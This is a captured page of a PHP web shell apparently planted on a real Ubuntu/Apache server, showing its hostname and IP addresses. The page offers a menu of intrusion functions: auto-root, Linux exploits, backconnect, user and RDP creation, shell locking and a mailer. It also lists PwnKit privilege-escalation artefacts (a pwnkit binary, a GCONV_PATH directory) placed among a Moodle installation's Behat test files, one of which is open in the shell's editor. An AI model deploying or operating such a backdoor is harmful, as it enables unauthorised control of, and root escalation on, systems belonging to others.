Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle.backup.39 /
blog /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
blog_visibility.feature
1.35
KB
-rw-rw-r--
comment.feature
2.88
KB
-rw-rw-r--
delete.feature
1.86
KB
-rw-rw-r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : blog_visibility.feature
@core @core_blog Feature: Blogs can be set to be only visible by the author. In order to make blogs personal only As a user I need to set the blog level to Users can only see their own blogs. Background: Given the following "users" exist: | username | firstname | lastname | email | | testuser | Test | User | moodle@example.com | | testuser2 | Test2 | User2 | moodle2@example.com | And the following "courses" exist: | fullname | shortname | | Course 1 | C1 | And the following "course enrolments" exist: | user | course | role | | testuser | C1 | student | | testuser2 | C1 | student | And I log in as "admin" And I am on site homepage And I navigate to "Blog" node in "Site administration > Appearance" And I set the following fields to these values: | Blog visibility | Users can only see their own blog | And I press "Save changes" And I log out Scenario: A student can not see another student's blog entries. Given I log in as "testuser" And I am on "Course 1" course homepage And I navigate to course participants And I follow "Test2 User2" And I should see "Miscellaneous" Then I should not see "Blog entries" And I follow "Profile" in the user menu And I follow "Blog entries" And I should see "User blog: Test User"
Close